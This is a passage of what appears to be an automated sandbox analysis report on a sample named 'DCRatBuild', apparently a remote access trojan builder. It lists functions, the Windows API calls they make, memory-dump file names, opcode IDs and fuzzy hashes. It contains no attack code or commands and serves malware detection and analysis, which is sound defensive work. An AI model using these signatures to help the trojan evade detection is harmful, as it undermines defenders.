                      • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                      • Instruction Fuzzy Hash: 0A021C71E11119DBDF14DFA9C8806ADBBF1EF48314F29816AE919E7284D731AD418BA0
                      Function 00D7A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                      Download Yara Rule
                      APIs
                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D7A662
                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,00D9E600,?,?), ref: 00D7A6B1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: FormatInfoLocaleNumber
                      • String ID:
                      • API String ID: 2169056816-0
                      • Opcode ID: 3187118788c700bdceadb93c1d4406dc4d53c44c8c9dfbb54a06000c38c32a31
                      • Instruction ID: 41a9f712b228579107aca205cafbb314140d83e3ddac2b71721c945c1476f9d3
                      • Opcode Fuzzy Hash: 3187118788c700bdceadb93c1d4406dc4d53c44c8c9dfbb54a06000c38c32a31
                      • Instruction Fuzzy Hash: 05014C36100308EADB10CF65EC05F9B77BCEF19710F005922BA08E7260D3709A248BB5
                      Function 00D66EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(00D7117C,?,00000200), ref: 00D66EC9
                      • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00D66EEA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorFormatLastMessage
                      • String ID:
                      • API String ID: 3479602957-0
                      • Opcode ID: ffbba8cc8f22633e47f1f33e2af1cd606659047b0c1fe0e0bbe06b56c263d239
                      • Instruction ID: 14eaf5b3ac08c2de00d47b10c216ba49f12ce54b1f7e1ad587e460fd264a76ca
                      • Opcode Fuzzy Hash: ffbba8cc8f22633e47f1f33e2af1cd606659047b0c1fe0e0bbe06b56c263d239
                      • Instruction Fuzzy Hash: 47D0C9353C8302BFEB110E75CC06F2B7BA4A755B82F20C515B35AE90E1CA71D424D639
                      Function 00D91194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D9118F,?,?,00000008,?,?,00D90E2F,00000000), ref: 00D913C1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: 0c1d3045bf61364945af8648e16b841c05e0fc4689ffb22af72274c656caf11b
                      • Instruction ID: 30544cf309b974ffc2263b41a384ca18f91a25eb26b96bc41b3e6ad777ad1673
                      • Opcode Fuzzy Hash: 0c1d3045bf61364945af8648e16b841c05e0fc4689ffb22af72274c656caf11b
                      • Instruction Fuzzy Hash: 6DB16D3961060ADFDB15CF28C48AB657BE0FF09364F298658E8D9CF2A1C335E981CB54
                      Function 00D6407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: gj
                      • API String ID: 0-4203073231
                      • Opcode ID: 7e6bbbe660ba5eb3de5972ba8c866f3ea88ef2f4e87a60cc35786ec04c379f9d
                      • Instruction ID: b33577070b2bec7cd32f42441a5f16729029b5597b9da957ef4b090b8016a4b6
                      • Opcode Fuzzy Hash: 7e6bbbe660ba5eb3de5972ba8c866f3ea88ef2f4e87a60cc35786ec04c379f9d
                      • Instruction Fuzzy Hash: 31F1C3B1A083418FD748CF29D880A1AFBE1BFCC208F15892EF598D7711E635E9558B56
                      Function 00D6ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                      Download Yara Rule
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 00D6AD1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Version
                      • String ID:
                      • API String ID: 1889659487-0
                      • Opcode ID: 2d8a9ce695acd026cfd20d737a8c97236663fc879aeb78ae1122b47fc5a72c6b
                      • Instruction ID: fa335a2f04ff6fb09882e15e86edf32f96f7745a06db4d693d28f0a45bb41484
                      • Opcode Fuzzy Hash: 2d8a9ce695acd026cfd20d737a8c97236663fc879aeb78ae1122b47fc5a72c6b
                      • Instruction Fuzzy Hash: 15F017B490030C8FCB28CF18EC426E977B5FB59715F20029AD959A3764E3B0AD408EB2
                      Function 00D7F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                      Download Yara Rule
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,00D7EAC5), ref: 00D7F068
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 88e4d52b0ab7d7a4802f565401675c83041787b579eebfab237f54bb818d3c58
                      • Instruction ID: 6f2799a97630ec1fb5a436df9fd25319dc4137fc2c2989a873d6a3b77b5818c9
                      • Opcode Fuzzy Hash: 88e4d52b0ab7d7a4802f565401675c83041787b579eebfab237f54bb818d3c58
                      • Instruction Fuzzy Hash:
                      Function 00D8B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: 0dcf499ec68d25ce5e29b67fa6f91ff498b8ca5723829558bf1322441c12266f
                      • Instruction ID: a34542a1574f1bab64e02e56bf6493fe86c363340d7dee7b8dbe3bfda2ebb539
                      • Opcode Fuzzy Hash: 0dcf499ec68d25ce5e29b67fa6f91ff498b8ca5723829558bf1322441c12266f
                      • Instruction Fuzzy Hash: D3A001B86413128B97408F76AA096093AA9BA46695709826AA509D6271EA2485609F21
                      Function 00D75C77 Relevance: .8, Instructions: 800COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                      • Instruction ID: 150ccba2a48775f81be42f664f8417cc34ce46d94a69c0e42faafa6df099aab6
                      • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                      • Instruction Fuzzy Hash: DB62E471604B859FCB29CF28C8906B9BBE1AF55304F08C56DD8EE8B746F630E945CB21
                      Function 00D770BF Relevance: .8, Instructions: 773COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                      • Instruction ID: f726aa7bba9ff808f0f2bd6e1fdd34473ddb605fd9b409105fdb66bb6ee09004
                      • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                      • Instruction Fuzzy Hash: 3362F5716087469FC719CF28C8805B9BBE1FF55308F18CA6DD9AA87742E730E955CBA0
                      Function 00D6ED14 Relevance: .7, Instructions: 694COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                      • Instruction ID: ea63d88f9444cb57e6b976ae3fd9d6c71142995ffda33a6cb29d3754c43c7eb2
                      • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                      • Instruction Fuzzy Hash: 7F523B726087018FC718CF19C891A6AF7E1FFCC314F498A2DE9859B255D734EA19CB86
                      Function 00D76A7B Relevance: .5, Instructions: 509COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bc41a1fc6c95f482f536f96e65c42274d6619f7d88c5f693da2215ca6c1be95a
                      • Instruction ID: 678bb9839278bcab6b81b35d84cb3d9abea813beecab87c31aa293114a7238d4
                      • Opcode Fuzzy Hash: bc41a1fc6c95f482f536f96e65c42274d6619f7d88c5f693da2215ca6c1be95a
                      • Instruction Fuzzy Hash: 2012C1B1604B068BC729CF28C9906B9B7E0FF54304F14892EE59BC7A81F774E895CB65
                      Function 00D6BE13 Relevance: .4, Instructions: 449COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8b5c43bc3a218cddba2359f7acf0209bd7372746a69d24ea2e5d569339ca1fc6
                      • Instruction ID: 468ca1a6fb56c4cdc34fa9661933b9d28c2d8b62a971adaeebb9a6154522a667
                      • Opcode Fuzzy Hash: 8b5c43bc3a218cddba2359f7acf0209bd7372746a69d24ea2e5d569339ca1fc6
                      • Instruction Fuzzy Hash: E8F1B872A183019FC718CF28C480A6ABBE1EFC9314F189A2EF4D5D7356D731E9458B66
                      Function 00D80B43 Relevance: .3, Instructions: 345COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction ID: 07f7b2daf14ac1c56ec18d990d43ccbc9b507e900b37e18b8e32e7ed8a7f7632
                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction Fuzzy Hash: CBC191362150930ADBAD9639893413FBEA15AA27B131E476DE4B2CB1D4FE20D52CDB30
                      Function 00D80F78 Relevance: .3, Instructions: 341COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction ID: 495724cef56a9521877b276c9ce9f33af1ef92b149d1bec7263280a5d1799371
                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction Fuzzy Hash: 4FC1B23A2051930ADF6D963A893413FBEA55AA27B131E476DD4B2CB0D4FE20D52DD730
                      Function 00D8070E Relevance: .3, Instructions: 331COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                      • Instruction ID: 9389eac50049a795bf6f4fe7bb8af66408a656aec7ca4071dcf2839f5a031b51
                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                      • Instruction Fuzzy Hash: A6C171362051930ADFAD963A893403FBEA15EA27B131E476DD4B2CB1D5FE20D568DB30
                      Function 00D76646 Relevance: .3, Instructions: 325COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      • Opcode ID: fd8fd53703ffbbeca3cadd7c01651d184e10ee3bc4151d6ea90c7eeeb0ab5d04
                      • Instruction ID: 087d870411c85c13f9d1a8a53ff0eeeb7b84996a26cf0a8eddefa109c07e82b2
                      • Opcode Fuzzy Hash: fd8fd53703ffbbeca3cadd7c01651d184e10ee3bc4151d6ea90c7eeeb0ab5d04
                      • Instruction Fuzzy Hash: 14D1E8B1A047419FDB14CF29C88075BBBE0EF55308F08856DE9889B642F734E959CBB6
                      Function 00D802F6 Relevance: .3, Instructions: 323COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                      • Instruction ID: a2f82fc8e0acc32253b289956a69f6cad2248f0b63c7c4395400e64bb1076a0c
                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                      • Instruction Fuzzy Hash: 32C172362051530ADFAD963A893443FBEA15AA27B131E476DD4B3CB1D5FE20D52C9B30
                      Function 00D6E2A0 Relevance: .3, Instructions: 318COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1428deffa6984c92ec5535c290b8c298f18518b12d82b0f576b648dfde769787
                      • Instruction ID: 5741f5c3696733da38532c265d8bc77c6193aad1722d5b9e5000805485ad7b2c
                      • Opcode Fuzzy Hash: 1428deffa6984c92ec5535c290b8c298f18518b12d82b0f576b648dfde769787
                      • Instruction Fuzzy Hash: 7EE125755183948FC304CF29D89096ABBF0AB8A300F89495EF5D597352C336EA19DBA2
                      Function 00D73A3C Relevance: .3, Instructions: 263COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
